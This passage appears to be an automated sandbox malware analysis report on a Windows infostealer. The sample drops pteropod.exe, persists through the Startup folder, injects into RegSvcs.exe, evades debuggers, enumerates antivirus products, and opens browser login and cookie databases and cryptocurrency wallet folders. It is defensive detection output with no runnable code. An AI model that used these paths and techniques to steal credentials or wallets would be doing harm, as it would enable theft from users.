Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 5_2_00475FE5 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 5_2_00475FE5
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 5_2_0044BF8D _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose, 5_2_0044BF8D
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_0040E470 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_0040E470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\
Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
Source: pteropod.exe, 00000001.00000002.1710250692.0000000002FE0000.00000004.00000020.00020000.00000000.sdmp, pteropod.exe, 00000001.00000003.1700281231.0000000003084000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OKSBRDRMWQEMu
Source: RegSvcs.exe, 00000002.00000002.1927969800.0000000000ABC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 2_2_07088F60 LdrInitializeThunk, 2_2_07088F60
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_0045A259 BlockInput, 0_2_0045A259
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_0040D6D0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW, 0_2_0040D6D0
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_0040EB70 LoadLibraryA,GetProcAddress, 0_2_0040EB70
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_03E8F190 mov eax, dword ptr fs:[00000030h] 0_2_03E8F190
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_03E8F130 mov eax, dword ptr fs:[00000030h] 0_2_03E8F130
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_03E8DAB0 mov eax, dword ptr fs:[00000030h] 0_2_03E8DAB0
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 1_2_03E4B2A0 mov eax, dword ptr fs:[00000030h] 1_2_03E4B2A0
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 1_2_03E4C980 mov eax, dword ptr fs:[00000030h] 1_2_03E4C980
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 1_2_03E4C920 mov eax, dword ptr fs:[00000030h] 1_2_03E4C920
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 5_2_03BA7218 mov eax, dword ptr fs:[00000030h] 5_2_03BA7218
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 5_2_03BA8898 mov eax, dword ptr fs:[00000030h] 5_2_03BA8898
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 5_2_03BA88F8 mov eax, dword ptr fs:[00000030h] 5_2_03BA88F8
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_00426DA1 CreateFileW,__lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock, 0_2_00426DA1
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_0042202E SetUnhandledExceptionFilter, 0_2_0042202E
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_004230F5 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_004230F5
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_00417D93 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00417D93
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_00421FA7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00421FA7
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 1_2_0042202E SetUnhandledExceptionFilter, 1_2_0042202E
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 1_2_004230F5 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_004230F5
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 1_2_00417D93 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 1_2_00417D93
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 1_2_00421FA7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 1_2_00421FA7
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 5_2_0042202E SetUnhandledExceptionFilter, 5_2_0042202E
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 5_2_004230F5 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 5_2_004230F5
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 5_2_00417D93 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 5_2_00417D93
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 5_2_00421FA7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 5_2_00421FA7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 6F3008
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 2FD008
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_0043916A LogonUserW, 0_2_0043916A
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_0040D6D0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW, 0_2_0040D6D0
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_004375B0 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput, 0_2_004375B0
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_00436431 __wcsicoll,mouse_event,__wcsicoll,mouse_event, 0_2_00436431
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\7xonkSJwuY.exe"
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe "C:\Users\user\AppData\Local\arrogatingly\pteropod.exe"
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\arrogatingly\pteropod.exe"
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_00445DD3 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity, 0_2_00445DD3
Source: pteropod.exe Binary or memory string: Shell_TrayWnd
Source: 7xonkSJwuY.exe, pteropod.exe.0.dr Binary or memory string: @3PDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_00410D10 cpuid 0_2_00410D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_004223BC GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 0_2_004223BC
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_004711D2 GetUserNameW, 0_2_004711D2
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_0042039F __invoke_watson,__get_daylight,__invoke_watson,__get_daylight,__invoke_watson,____lc_codepage_func,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson, 0_2_0042039F
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_0040E470 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_0040E470
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

Stealing of Sensitive Information

Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 2.2.RegSvcs.exe.6be0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.RegSvcs.exe.6be0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.1929347646.0000000002989000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1939017014.0000000006BE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 7544, type: MEMORYSTR
Source: Yara match File source: 5.2.pteropod.exe.2ec0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.pteropod.exe.c10000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.pteropod.exe.2ec0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.RegSvcs.exe.530000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.pteropod.exe.c10000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000002.1906683900.0000000000532000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1929347646.00000000028E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1710132374.0000000000C10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.1877085123.0000000002EC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: pteropod.exe PID: 7508, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 7544, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: pteropod.exe PID: 7856, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 7940, type: MEMORYSTR
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\atomic\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\Cache\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\db\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\Guarda\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\
Source: pteropod.exe.0.dr Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 6, 0USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:cdeclwinapistdcallnonestrwstrintbooluintlongulongdwordshortushortwordbyteubytebooleanfloatdoubleptrhwndhandlelresultlparamwparamint64uint64int_ptruint_ptrlong_ptrulong_ptrdword_ptridispatch64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----
Source: pteropod.exe Binary or memory string: WIN_XP
Source: pteropod.exe Binary or memory string: WIN_XPe
Source: pteropod.exe Binary or memory string: WIN_VISTA
Source: pteropod.exe Binary or memory string: WIN_7
Source: Yara match File source: 00000002.00000002.1929347646.0000000002989000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 7544, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 2.2.RegSvcs.exe.6be0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.RegSvcs.exe.6be0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.1929347646.0000000002989000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1939017014.0000000006BE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 7544, type: MEMORYSTR
Source: Yara match File source: 5.2.pteropod.exe.2ec0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.pteropod.exe.c10000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.pteropod.exe.2ec0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.RegSvcs.exe.530000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.pteropod.exe.c10000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000002.1906683900.0000000000532000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1929347646.00000000028E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1710132374.0000000000C10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.1877085123.0000000002EC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: pteropod.exe PID: 7508, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 7544, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: pteropod.exe PID: 7856, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 7940, type: MEMORYSTR
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_004741BB socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 0_2_004741BB
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_0046483C socket,WSAGetLastError,bind,WSAGetLastError,listen,WSAGetLastError,closesocket, 0_2_0046483C
Source: C:\Users\user\Desktop\7xonkSJwuY.exe Code function: 0_2_0047AD92 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject, 0_2_0047AD92
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 1_2_004741BB socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 1_2_004741BB
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 1_2_0046483C socket,WSAGetLastError,bind,WSAGetLastError,listen,WSAGetLastError,closesocket, 1_2_0046483C
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 1_2_0047AD92 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject, 1_2_0047AD92
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 5_2_004741BB socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 5_2_004741BB
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 5_2_0046483C socket,WSAGetLastError,bind,WSAGetLastError,listen,WSAGetLastError,closesocket, 5_2_0046483C
Source: C:\Users\user\AppData\Local\arrogatingly\pteropod.exe Code function: 5_2_0047AD92 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject, 5_2_0047AD92